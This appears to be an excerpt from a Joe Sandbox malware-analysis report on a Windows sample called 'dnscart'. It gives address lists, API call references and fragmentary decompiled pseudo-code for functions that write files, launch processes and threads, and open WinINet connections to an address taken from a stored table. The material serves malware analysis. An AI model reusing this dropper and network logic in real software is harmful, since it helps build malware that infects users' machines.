0x0022414c
0x00224154
0x0022415b
0x00224173
0x0022417a
0x002241a2
0x002241a8
0x002241ab
0x002241ae
0x0022415d
0x00224163
0x0022416e
0x0022416e
0x002241b7
0x002241c0
0x002241c2
0x002241c8
0x002241cb
0x002241ce
0x002241d0
0x00000000
0x002241d6
0x002241da
0x002241fd
0x00224229
0x0022422c
0x0022422c
0x00224233
0x00224236
0x0022423c
0x002242e0
0x002242e0
0x002242e5
0x002242e6
0x002242e7
0x002242f0
0x002242fe
0x00224304
0x00224307
0x0022430a
0x0022430c
0x00000000
0x00224312
0x00224322
0x0022432c
0x00224343
0x0022432e
0x0022433b
0x0022433b
0x00224353
0x0022435a
0x00224368
0x0022436e
0x00224377
0x00224379
0x00224385
0x00000000
0x00224385
0x00224242
0x00224242
0x00224242
0x00224248
0x002242a7
0x002242b3
0x00000000
0x0022424a
0x0022424a
0x0022424d
0x00224250
0x00224291
0x0022429f
0x002242b6
0x002242b8
0x00000000
0x002242ba
0x002242c5
0x002242c8
0x002242ce
0x002242d1
0x002242da
0x00000000
0x00000000
0x00000000
0x00000000
0x002242da
0x00224252
0x00224252
0x00224252
0x00224259
0x0022425c
0x0022528b
0x00224250
0x00224248
0x00224205
0x00224205
0x00224205
0x0022420c
0x0022420f
0x0022528d
0x002241dc
0x002241e5
0x002241ee
0x002241f1
0x00000000
0x002241f1
0x002241da
0x00223fa1
0x00223faa
0x0022411a
0x00224121
0x0022412a
0x00224133
0x00000000
0x00223fb0
0x00223fb0
0x00223fc7
0x00223fcf
0x00223fd6
0x00223ffa
0x00000000
0x00223ffc
0x00223ffc
0x00224003
0x00224021
0x0022402b
0x00224031
0x00224034
0x0022403b
0x00000000
0x00000000
0x00000000
0x0022403d
0x00224040
0x00224043
0x0022404c
0x00000000
0x0022404e
0x00000000
0x0022404e
0x0022404c
0x00223fd8
0x00223fdb
0x00223fde
0x00223fe5
0x00224053
0x00224053
0x00224059
0x002240b8
0x002240c4
0x00000000
0x0022405b
0x0022405b
0x0022405e
0x00224061
0x002240a2
0x002240b0
0x002240c7
0x002240c9
0x00000000
0x002240cb
0x002240d1
0x002240d9
0x002240df
0x002240e2
0x002240e9
0x00000000
0x00000000
0x00000000
0x00000000
0x002240e9
0x00224063
0x00224063
0x00224063
0x0022406a
0x0022406d
0x0022528f
0x00224061
0x00223fef
0x002240ef
0x00000000
0x002240ef
0x00223fe5
0x00223fd6
0x00223faa
0x00223f9b
0x00223f91
0x00223d35
0x00223d35
0x00223d35
0x00223d3c
0x00223d3f
0x00223d3f
0x00223d2a
0x00223bc5
0x002237de
0x002237de
0x002237de
0x002237e5
0x002237e8
0x002237e8
0x0022326b
0x0022326b
0x00223274
0x0022331b
0x00223326
0x0022332c
0x00223334
0x00223339
0x00000000
0x0022333f
0x0022333f
0x00223351
0x00223355
0x002234f8
0x00223515
0x00223520
0x0022352e
0x00223554
0x00223558
0x0022367b
0x0022367f
0x00000000
0x00223685
0x00223685
0x00223685
0x0022368b
0x002236ad
0x002236ad
0x002236b3
0x00223711
0x00223727
0x00223713
0x00223719
0x00223719
0x00223736
0x00223773
0x00223738
0x00223746
0x0022375c
0x00223748
0x0022374e
0x0022374e
0x00223768
0x00223768
0x0022377f
0x0022378b
0x0022378f
0x00223793
0x002237a2
0x002237a4
0x002237b0
0x002237b6
0x002237bc
0x002237c8
0x00000000
0x002236b5
0x002236b8
0x002236bb
0x002236dd
0x002236dd
0x002236e4
0x002236e7
0x002236bd
0x002236bd
0x002236bd
0x002236c4
0x002236c7
0x002236c7
0x002236bb
0x0022368d
0x0022368d
0x0022368d
0x00223694
0x00223697
0x00223697
0x0022368b
0x00223568
0x00223568
0x0022356c
0x0022360e
0x00223617
0x00223620
0x00223629
0x0022362c
0x0022362e
0x00000000
0x00223634
0x00223634
0x00223634
0x0022363a
0x00223662
0x0022366a
0x00223670
0x00223673
0x00000000
0x0022363c
0x0022363c
0x0022363c
0x00223643
0x00223646
0x00223646
0x0022363a
0x00223572
0x00223572
0x00223572
0x00223578
0x002235d7
0x002235e3
0x00000000
0x0022357a
0x0022357a
0x0022357d
0x00223580
0x002235c1
0x002235cf
0x002235e6
0x002235e8
0x00000000
0x002235ea
0x002235f8
0x00223601
0x00223608
0x00000000
0x00000000
0x00000000
0x00000000
0x00223608
0x00223582
0x00223582
0x00223582
0x00223589
0x0022358c
0x0022358c
0x00223580
0x00223578
0x0022356c
0x00223530
0x00223530
0x00223530
0x00223537
0x0022353a
0x0022353a
0x0022335b
0x0022335f
0x0022343f
0x0022343f
0x00223445
0x002234b1
0x002234bd
0x00000000
0x00223447
0x00223447
0x0022344a
0x0022344d
0x00223499
0x002234a4
0x002234c0
0x002234c2
0x00000000
0x00000000
0x00000000
0x00000000
0x0022344f
0x0022344f
0x0022344f
0x00223456
0x00223459
0x00223459
0x0022344d
0x00223365
0x00223365
0x00223369
0x0022340b
0x0022341a
0x00223426
0x0022342f
0x00223434
0x00000000
0x0022343a
0x002234c8
0x0022334b
0x0022334e
0x00000000
0x0022334e
0x0022336f
0x0022336f
0x0022336f
0x00223375
0x002233d4
0x002233e0
0x00000000
0x00223377
0x00223377
0x0022337a
0x0022337d
0x002233be
0x002233cc
0x002233e3
0x002233e5
0x00000000
0x002233e7
0x002233f5
0x002233fe
0x00223405
0x00000000
0x00000000
0x00000000
0x00000000
0x00223405
0x0022337f
0x0022337f
0x0022337f
0x00223386
0x00223389
0x00223389
0x0022337d
0x00223375
0x00223369
0x0022335f
0x00223355
0x0022327a
0x0022327a
0x0022327a
0x00223280
0x002232df
0x002232eb
0x00000000
0x00223282
0x00223282
0x00223285
0x00223288
0x002232c9
0x002232d7
0x002232ee
0x002232f0
0x00000000
0x002232f2
0x00223300
0x00223309
0x00223315
0x00000000
0x00000000
0x00000000
0x00000000
0x00223315
0x0022328a
0x0022328a
0x0022328a
0x00223291
0x00223294
0x00223294
0x00223288
0x00223280
0x00223274
0x00223265
0x0022318e
0x0022318e
0x0022318e
0x00223194
0x002231f3
0x002231ff
0x00000000
0x00223196
0x00223196
0x00223199
0x0022319c
0x002231dd
0x002231eb
0x00223202
0x00223204
0x00000000
0x00223206
0x00223214
0x0022321d
0x00223224
0x00000000
0x00000000
0x00000000
0x00000000
0x00223224
0x0022319e
0x0022319e
0x0022319e
0x002231a5
0x002231a8
0x002231a8
0x0022319c
0x00223194
0x00224fea
0x00224fed
0x00224ff0
0x00225253
0x00225253
0x0022525a
0x0022525d
0x00224ff6
0x00224ff6
0x00224fff
0x002250a6
0x002250b1
0x002250b7
0x002250bf
0x002250c2
0x002250c4
0x00000000
0x002250ca
0x002250ca
0x002250dc
0x002250e0
0x00000000
0x002250e6
0x002250ea
0x002251c1
0x002251c1
0x002251c7
0x00225226
0x00225232
0x00000000
0x002251c9
0x002251c9
0x002251cc
0x002251cf
0x00225210
0x0022521e
0x00225235
0x00225237
0x00000000
0x00000000
0x00000000
0x00000000
0x002251d1
0x002251d1
0x002251d1
0x002251d8
0x002251db
0x00225275
0x002251cf
0x002250f0
0x002250f0
0x002250f4
0x00225196
0x0022519f
0x002251ab
0x002251b4
0x002251b9
0x00000000
0x002251bf
0x00225239
0x00225242
0x0022524b
0x002250d6
0x002250d9
0x00000000
0x002250d9
0x002250fa
0x002250fa
0x002250fa
0x00225100
0x0022515f
0x0022516b
0x00000000
0x00225102
0x00225102
0x00225105
0x00225108
0x00225149
0x00225157
0x0022516e
0x00225170
0x00000000
0x00225172
0x00225180
0x00225189
0x00225190
0x00000000
0x00000000
0x00000000
0x00000000
0x00225190
0x0022510a
0x0022510a
0x0022510a
0x00225111
0x00225114
0x00225277
0x00225108
0x00225100
0x002250f4
0x002250ea
0x002250e0
0x00225005
0x00225005
0x00225005
0x0022500b
0x0022506a
0x00225076
0x00000000
0x0022500d
0x0022500d
0x00225010
0x00225013
0x00225054
0x00225062
0x00225079
0x0022507b
0x00000000
0x0022507d
0x0022508b
0x00225094
0x002250a0
0x00000000
0x00000000
0x00000000
0x00000000
0x002250a0
0x00225015
0x00225015
0x00225015
0x0022501c
0x0022501f
0x00225279
0x00225013
0x0022500b
0x00224fff
0x00224ff0
0x00224fe4
0x002248e8
0x00000000
0x00000000
0x00000000
0x00224477
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00224de4
0x00000000
0x00000000
0x00000000
0x00000000
0x00222f58
0x00225291
0x00225291
0x00225296
0x00225297
0x00000000
0x00225297
0x00225521
0x00225525

Strings

5, xrefs: 00222F3E

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00222220, Relevance: 1.5, APIs: 1, Instructions: 5process

APIs

CreateProcessAsUserW.ADVAPI32 ref: 00222220

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00221BE0, Relevance: .0, Instructions: 38

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00229AF1, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 58

APIs

memset.NTDLL ref: 00229AF9
memset.NTDLL ref: 00229B07
GetLastError.KERNEL32 ref: 00229B28
GetTickCount.KERNEL32 ref: 00229B37
_snwprintf.NTDLL ref: 00229B8E
GetProcessHeap.KERNEL32(00000000,?), ref: 00229B9A
HeapFree.KERNEL32(00000000), ref: 00229BA1
GetLastError.KERNEL32 ref: 00229BB8

Strings

D, xrefs: 00229B10
C:\Windows\SysWOW64, xrefs: 00229B7C

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 0022A658, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 42
processfile

C-Code - Quality: 56%

			E0022A658() {
				void* _t22;
				void* _t24;
				void* _t26;

				WriteFile();
				CloseHandle(_t24);
				memset(_t26 - 0x5c, 0, 0x44);
				 *(_t26 - 0x5c) = 0x44;
				if(CreateProcessW(_t26 - 0x320, 0, 0, 0, 0, 0, 0, 0, _t26 - 0x5c, _t26 - 0x18) != 0) {
					CloseHandle( *(_t26 - 0x18));
					_push( *((intOrPtr*)(_t26 - 0x14)));
					CloseHandle();
				}
				HeapFree(GetProcessHeap(), 0, _t22);
				return 0;
			}

0x0022a658
0x0022a65f
0x0022a66d
0x0022a676
0x0022a6a2
0x0022a6a7
0x0022a6ad
0x0022a6b0
0x0022a6b0
0x0022a6c0
0x0022a6ce

APIs

WriteFile.KERNEL32 ref: 0022A658
CloseHandle.KERNEL32 ref: 0022A65F
memset.NTDLL ref: 0022A66D
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0022A69A
CloseHandle.KERNEL32(?), ref: 0022A6A7
CloseHandle.KERNEL32(?), ref: 0022A6B0
GetProcessHeap.KERNEL32(00000000), ref: 0022A6B9
HeapFree.KERNEL32(00000000), ref: 0022A6C0

Strings

D, xrefs: 0022A676

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 0022A6E0, Relevance: 15.1, APIs: 10, Instructions: 65
thread

C-Code - Quality: 100%

			E0022A6E0(void* __ecx) {
				void* _t15;
				void* _t22;
				void _t25;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t33;

				_t31 = __ecx;
				_t15 = RtlAllocateHeap(GetProcessHeap(), 8,  *((intOrPtr*)(__ecx + 0xc)) + 0x10);
				_t33 = _t15;
				if(_t33 == 0) {
					return _t15;
				} else {
					 *_t33 =  *_t31;
					 *((intOrPtr*)(_t33 + 4)) =  *((intOrPtr*)(_t31 + 4));
					_t4 = _t33 + 0x10; // 0x10
					_t29 = _t4;
					 *(_t33 + 8) = _t29;
					 *(_t33 + 0xc) =  *(_t31 + 0xc);
					memcpy(_t29,  *(_t31 + 8),  *(_t31 + 0xc));
					_t32 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
					if(_t32 == 0) {
						L5:
						return HeapFree(GetProcessHeap(), 0, _t33);
					}
					 *(_t32 + 4) =  *_t33;
					_t22 = CreateThread(0, 0, 0x22a3f0, _t33, 0, 0);
					 *(_t32 + 8) = _t22;
					if(_t22 == 0) {
						HeapFree(GetProcessHeap(), 0, _t32);
						goto L5;
					}
					_t25 =  *0x22cbd4; // 0x0
					 *_t32 = _t25;
					 *0x22cbd4 = _t32;
					return _t25;
				}
			}

0x0022a6e2
0x0022a6f4
0x0022a6fa
0x0022a6fe
0x0022a793
0x0022a704
0x0022a706
0x0022a70b
0x0022a70e
0x0022a70e
0x0022a711
0x0022a717
0x0022a721
0x0022a73b
0x0022a73f
0x0022a781
0x00000000
0x0022a78b
0x0022a751
0x0022a754
0x0022a75a
0x0022a75f
0x0022a77b
0x00000000
0x0022a77b
0x0022a761
0x0022a766
0x0022a768
0x0022a770
0x0022a770

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 0022A6ED
RtlAllocateHeap.NTDLL(00000000), ref: 0022A6F4
memcpy.NTDLL(00000010,?,?), ref: 0022A721
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 0022A72E
RtlAllocateHeap.NTDLL(00000000), ref: 0022A735
CreateThread.KERNEL32(00000000,00000000,Function_0000A3F0,00000000,00000000,00000000), ref: 0022A754
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0022A774
HeapFree.KERNEL32(00000000), ref: 0022A77B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0022A784
HeapFree.KERNEL32(00000000), ref: 0022A78B

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 0022A515, Relevance: 15.0, APIs: 10, Instructions: 50
file

C-Code - Quality: 26%

			E0022A515(void* __edi, void* __eflags) {
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t37;

				_t32 = __edi;
				WriteFile(??, ??, ??, ??, ??);
				CloseHandle(_t34);
				L00221830(0x221398, 4);
				_t35 =  *(_t37 - 4);
				 *0x22c20c(_t37 - 0x528, 0x104, _t35, _t37 - 0x320, 0x6e15c1da, _t37 - 4);
				HeapFree(GetProcessHeap(), 0, _t35);
				_push(_t37 - 0x18);
				_push( *((intOrPtr*)(_t37 + 8)));
				if(L002221B0(_t37 - 0x528, _t32) != 0) {
					CloseHandle( *(_t37 - 0x18));
					CloseHandle( *(_t37 - 0x14));
				}
				_push( *((intOrPtr*)(_t37 + 8)));
				CloseHandle();
				HeapFree(GetProcessHeap(), 0, _t32);
				return 0;
			}

0x0022a515
0x0022a515
0x0022a51c
0x0022a535
0x0022a53a
0x0022a551
0x0022a564
0x0022a56d
0x0022a56e
0x0022a581
0x0022a586
0x0022a58f
0x0022a58f
0x0022a595
0x0022a6b0
0x0022a6c0
0x0022a6ce

APIs

WriteFile.KERNEL32 ref: 0022A515
CloseHandle.KERNEL32 ref: 0022A51C
_snwprintf.NTDLL ref: 0022A551
GetProcessHeap.KERNEL32(00000000,?), ref: 0022A55D
HeapFree.KERNEL32(00000000), ref: 0022A564
CloseHandle.KERNEL32(?), ref: 0022A586
CloseHandle.KERNEL32(?), ref: 0022A58F
CloseHandle.KERNEL32(?), ref: 0022A6B0
GetProcessHeap.KERNEL32(00000000), ref: 0022A6B9
HeapFree.KERNEL32(00000000), ref: 0022A6C0

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 002216D3, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 38
process

C-Code - Quality: 45%

			E002216D3() {
				void* __edi;
				void* __esi;
				int _t12;
				void* _t13;

				memset();
				 *(_t13 - 0x58) = 0x44;
				 *((intOrPtr*)(_t13 - 0x2c)) = 0x80;
				_t12 = CreateProcessW(_t13 - 0x360, 0, 0, 0, 0, 0, 0, 0, _t13 - 0x58, _t13 - 0x14);
				if(_t12 == 0) {
					goto 0x230044;
					asm("int3");
					asm("int3");
					return _t12;
				} else {
					WaitForSingleObject(__esi, 0xffffffff);
					CloseHandle( *(__ebp - 0x14));
					CloseHandle( *(__ebp - 0x10));
					CloseHandle(__esi);
					CloseHandle(__edi);
					_pop(__edi);
					_pop(__esi);
					_pop(__ebp);
					return 1;
				}
			}

0x002216d3
0x002216dc
0x002216e6
0x00221707
0x0022170f
0x00221691
0x00221696
0x00221697
0x00221698
0x00221711
0x00221714
0x0022171d
0x00221726
0x0022172d
0x00221734
0x0022173a
0x00221740
0x00221743
0x00221744
0x00221744

APIs

memset.NTDLL ref: 002216D3
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00221707
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00221714
CloseHandle.KERNEL32(?), ref: 0022171D
CloseHandle.KERNEL32(?), ref: 00221726
CloseHandle.KERNEL32 ref: 0022172D
CloseHandle.KERNEL32 ref: 00221734

Strings

D, xrefs: 002216DC

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 0022A402, Relevance: 13.6, APIs: 9, Instructions: 76

APIs

WTSGetActiveConsoleSessionId.KERNEL32 ref: 0022A420
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0022A5B5
GetTickCount.KERNEL32 ref: 0022A5BB
_snwprintf.NTDLL ref: 0022A60E
GetProcessHeap.KERNEL32(00000000,?), ref: 0022A61A
HeapFree.KERNEL32(00000000), ref: 0022A621
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0022A640
GetProcessHeap.KERNEL32(00000000), ref: 0022A6B9
HeapFree.KERNEL32(00000000), ref: 0022A6C0

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 0022A46E, Relevance: 13.6, APIs: 9, Instructions: 58

C-Code - Quality: 26%

			E0022A46E(void* __edi, void* __eflags) {
				signed int _t22;
				void* _t28;
				void* _t59;
				void* _t63;
				void* _t64;
				void* _t66;
				void* _t67;

				_t59 = __edi;
				 *0x22c214();
				_t22 = GetTickCount();
				_t2 = (_t22 & 0x00000007) + 1; // 0x1
				L00222270(_t67 - 0x98, _t2);
				 *((short*)(_t67 + (_t22 & 0x00000007) * 2 - 0x96)) = 0;
				L00221830(0x2215a4, 0xc);
				_t63 =  *(_t67 - 4);
				_t28 = _t67 - 0x320;
				 *0x22c20c(_t28, 0x104, _t63, _t28, _t67 - 0x98, 0x6e15c1da, _t67 - 4);
				HeapFree(GetProcessHeap(), 0, _t63);
				_t64 = CreateFileW(_t67 - 0x320, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t64 != 0xffffffff) {
					goto 0x231e83;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					WriteFile();
					CloseHandle(_t64);
					L00221830(0x221398, 4);
					_t66 =  *(_t67 - 4);
					 *0x22c20c(_t67 - 0x528, 0x104, _t66, _t67 - 0x320, 0x6e15c1da, _t67 - 4);
					HeapFree(GetProcessHeap(), 0, _t66);
					_push(_t67 - 0x18);
					_push( *((intOrPtr*)(_t67 + 8)));
					if(L002221B0(_t67 - 0x528, _t59) != 0) {
						CloseHandle( *(_t67 - 0x18));
						CloseHandle( *(_t67 - 0x14));
					}
				}
				_push( *((intOrPtr*)(_t67 + 8)));
				CloseHandle();
				HeapFree(GetProcessHeap(), 0, _t59);
				return 0;
			}

0x0022a46e
0x0022a46e
0x0022a474
0x0022a485
0x0022a488
0x0022a494
0x0022a4aa
0x0022a4af
0x0022a4b9
0x0022a4c7
0x0022a4da
0x0022a4ff
0x0022a504
0x0022a50a
0x0022a50f
0x0022a510
0x0022a511
0x0022a512
0x0022a513
0x0022a514
0x0022a515
0x0022a51c
0x0022a535
0x0022a53a
0x0022a551
0x0022a564
0x0022a56d
0x0022a56e
0x0022a581
0x0022a586
0x0022a58f
0x0022a58f
0x0022a581
0x0022a595
0x0022a6b0
0x0022a6c0
0x0022a6ce

APIs

SHGetFolderPathW.SHELL32 ref: 0022A46E
GetTickCount.KERNEL32 ref: 0022A474
_snwprintf.NTDLL ref: 0022A4C7
GetProcessHeap.KERNEL32(00000000,?), ref: 0022A4D3
HeapFree.KERNEL32(00000000), ref: 0022A4DA
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0022A4F9
CloseHandle.KERNEL32(?), ref: 0022A6B0
GetProcessHeap.KERNEL32(00000000), ref: 0022A6B9
HeapFree.KERNEL32(00000000), ref: 0022A6C0

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 002286C5, Relevance: 13.5, APIs: 9, Instructions: 20
network

C-Code - Quality: 58%

			E002286C5(intOrPtr* __edi) {
				void* _t24;
				void* _t26;

				HeapFree(GetProcessHeap(), ??, ??);
				InternetCloseHandle( *(_t26 - 0x30));
				InternetCloseHandle( *(_t26 - 0x34));
				InternetCloseHandle( *(_t26 - 0x38));
				HeapFree(GetProcessHeap(), 0, 0);
				HeapFree(GetProcessHeap(), 0, _t24);
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				return 0 |  *__edi != 0x00000000;
			}

0x002286cc
0x002286d5
0x002286de
0x002286e7
0x002286f8
0x00228708
0x0022871a
0x0022872c
0x0022873f

APIs

GetProcessHeap.KERNEL32 ref: 002286C5
HeapFree.KERNEL32(00000000), ref: 002286CC
InternetCloseHandle.WININET(?), ref: 002286D5
InternetCloseHandle.WININET(?), ref: 002286DE
InternetCloseHandle.WININET(?), ref: 002286E7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002286F1
HeapFree.KERNEL32(00000000), ref: 002286F8
GetProcessHeap.KERNEL32(00000000,?), ref: 00228701
HeapFree.KERNEL32(00000000), ref: 00228708

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00228BFA, Relevance: 12.1, APIs: 8, Instructions: 91string

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00228C28
lstrlenW.KERNEL32(?), ref: 00228C35
lstrlenW.KERNEL32(00000004), ref: 00228C84
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00228CA0
RtlAllocateHeap.NTDLL(00000000), ref: 00228CA7
lstrcmpiW.KERNEL32(00000004,?), ref: 00228CC5
lstrcpyW.KERNEL32(00000000,00000004), ref: 00228CDA
lstrlenW.KERNEL32(00000004), ref: 00228CE4

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 002285DF, Relevance: 10.5, APIs: 7, Instructions: 47

C-Code - Quality: 34%

			E002285DF(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __eflags) {
				signed char* _t28;
				void* _t30;
				void _t49;
				intOrPtr _t52;
				void* _t53;
				signed char* _t56;
				void* _t58;
				intOrPtr* _t64;
				void* _t66;
				void* _t67;
				void* _t69;

				_t64 = __edi;
				_t53 = __ebx;
				asm("scasb");
				asm("int3");
				L00221830(__ecx, __edx);
				_t56 =  *0x22c298; // 0x0
				_t66 =  *(_t69 + 8);
				 *0x22c20c(_t69 - 0xb8, 0x40, _t66, _t56[3] & 0x000000ff, _t56[2] & 0x000000ff, _t56[1] & 0x000000ff,  *_t56 & 0x000000ff);
				HeapFree(GetProcessHeap(), 0, _t66);
				_t28 =  *0x22c298; // 0x0
				_t61 = _t69 - 0xb8;
				_push(_t56);
				_t57 = _t69 - 0x38;
				_push(_t28[4] & 0x0000ffff);
				_t30 = L00221C50(_t69 - 0x38, _t69 - 0xb8, _t64);
				_t67 =  *(_t69 - 8);
				if(_t30 != 0) {
					goto 0x23165c;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					if(L00221D40(_t57) != 0) {
						goto 0x231674;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						if(L00221E80(_t41, _t57, _t61) != 0) {
							goto 0x23168c;
							asm("int3");
							asm("int3");
							if(L00222560(_t61, _t64) != 0) {
								_t58 =  *(_t69 - 0x10);
								_t49 =  *_t58;
								 *_t53 = _t49;
								if(_t49 < 0x4000000) {
									_push(_t53);
									_t52 = L00228500(_t58 + 4,  *((intOrPtr*)(_t69 - 0xc)) - 4, _t64);
									_t58 =  *(_t69 - 0x10);
									 *_t64 = _t52;
								}
								HeapFree(GetProcessHeap(), 0, _t58);
							}
							HeapFree(GetProcessHeap(), ??, ??);
						}
						InternetCloseHandle( *(_t69 - 0x30));
					}
					InternetCloseHandle( *(_t69 - 0x34));
					InternetCloseHandle( *(_t69 - 0x38));
				}
				HeapFree(GetProcessHeap(), 0, 0);
				HeapFree(GetProcessHeap(), 0, _t67);
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				return 0 |  *_t64 != 0x00000000;
			}

0x002285df
0x002285df
0x002285df
0x002285e0
0x002285e1
0x002285e6
0x002285ec
0x0022860c
0x0022861f
0x00228625
0x0022862a
0x00228630
0x00228631
0x00228638
0x00228639
0x0022863e
0x00228646
0x0022864c
0x00228651
0x00228652
0x00228653
0x00228654
0x00228655
0x00228660
0x00228662
0x00228667
0x00228668
0x00228669
0x0022866a
0x0022866b
0x00228676
0x00228678
0x0022867d
0x0022867e
0x00228689
0x0022868b
0x0022868e
0x00228690
0x00228697
0x0022869f
0x002286a3
0x002286a8
0x002286ae
0x002286ae
0x002286ba
0x002286ba
0x002286cc
0x002286cc
0x002286d5
0x002286d5
0x002286de
0x002286e7
0x002286e7
0x002286f8
0x00228708
0x0022871a
0x0022872c
0x0022873f

APIs

_snwprintf.NTDLL ref: 0022860C
GetProcessHeap.KERNEL32(00000000,?), ref: 00228618
HeapFree.KERNEL32(00000000), ref: 0022861F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002286F1
HeapFree.KERNEL32(00000000), ref: 002286F8
GetProcessHeap.KERNEL32(00000000,?), ref: 00228701
HeapFree.KERNEL32(00000000), ref: 00228708

Memory Dump Source

